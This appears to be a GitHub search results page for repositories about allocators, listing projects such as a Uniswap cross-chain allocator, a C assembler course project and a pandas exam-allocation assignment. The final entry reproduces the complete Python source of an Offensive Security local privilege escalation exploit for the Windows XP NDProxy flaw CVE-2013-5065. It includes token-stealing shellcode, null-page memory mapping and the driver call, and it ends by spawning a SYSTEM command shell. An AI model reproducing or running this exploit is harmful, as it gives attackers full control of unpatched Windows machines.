Found 7 repositories(showing 7)
Uniswap
A repository for developing smart contract allocators that leverage The Compact for performing cross-chain swaps
arminms
A benchmark for using Intel TBB's scalable_allocator in C++17 parallel algorithms
YarinIsYarin
This is an assembler written in C (C90 to be precise) as a final assignment in the course System Programming Lab (מעבדה בתכנות מערכות) taken in the second semester of 2017 as a part of my B.Sc. in mathematics and computer science. This received the max score of 100. This assembler uses two passes to process the input – In the first passage we find all the variable and similar things and allocate the memory for them, in the second passage we encode the instructions. Note: This project does not contain a tlinker.
Md-Farhan-Jeelani
You are a Controller of Examination (COE) in an Examination body which regularly organises an online examination. As a part of your reasonability you need to generate various reports from the database. Your task is to automate the entire process using pandas. Details of database are as follows: Application_ID : ID of applicant D_O_B : Date of Birth Sex : Gender of Candidate H_Qual : Highest qualification of the candidate TH_CENT_CH : First choice of examination city SEC_TH_CEN : Second Choice of Examination City CATEGORY : Category of student Rollno : Roll Number of the candidate (To be filled by CEO) cent_allot : Examination centre district (To be filled by CEO) cent_add : Examination Centre Address (To be filled by CEO) examDate : Examination Date (To be filled by CEO) batch : Allotted batch on examination Date (To be filled by CEO) rep_time : Reporting time for examination (To be filled by CEO) Stage One: Finalization of Candidate Count 1. Calculate Candidate count in each district based on the first choice of examination city. 2. Assume that as per policy district having more than 25 students should have examination centre. District in which students are less than 25, adjust those students to other districts based on their second choices and find the final candidate count of each district. 3. Find out the number of General, SC, ST & OBC candidates and visualize the distribution using a suitable plot identifying ratio of women candidates in each of these categories. Stage Two: Preparation of Database In each examination centre, exam is to be organised in two shifts batch I & batch II(reporting time 9:00 AM & 2 PM). Exam can be conducted any number of days in a city during December 1-30, 2020 depending upon the number of candidate in a city. Note in each city only one examination centre is possible and in one shift maximum 20 students can appear. 4. Based on the information mentioned above complete the examination database by allocating: o Rollno: Roll number of the candidate will start from NL2000001 onwards(eg: NL2000001,NL2000002,NL2000003……) o cent_allot : allocate centre by putting examination city code o cent_add: put NIELIT <District Name> as center address in each location (for eg if district name is ADI then centre add is NIELIT ADI) o examDate: Allocate any exam date between December 1,2020 to December 30, 2020 keeping minimum no of examination days and not violating any conditions mentioned above o batch: allocate batch I or II ensuring all the conditions mentioned above o rep_time: for batch I reporting time is 9 AM and for batch II reporting time is 2 PM.
basic memory allocator and string arenas from scratch
dsuri0109
Project to allocate engineering and SC resources on engineering
Friarfukd
# NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/ # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ?? ??? from ctypes import * from ctypes.wintypes import * import os, sys kernel32 = windll.kernel32 ntdll = windll.ntdll GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE = 0x0020 PROCESS_VM_READ = 0x0010 MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 MEM_FREE = 0x00010000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = 2097151 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0 def log(msg): print msg def getLastError(): """[-] Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value) else: log("[-] Unknown Error") print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security" tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp) dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS: print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0: print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc getLastError() dwRetBytes = DWORD(0) DEVICE_NAME = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1: print "[-] Couldn't open the device... :(" sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")
All 7 repositories loaded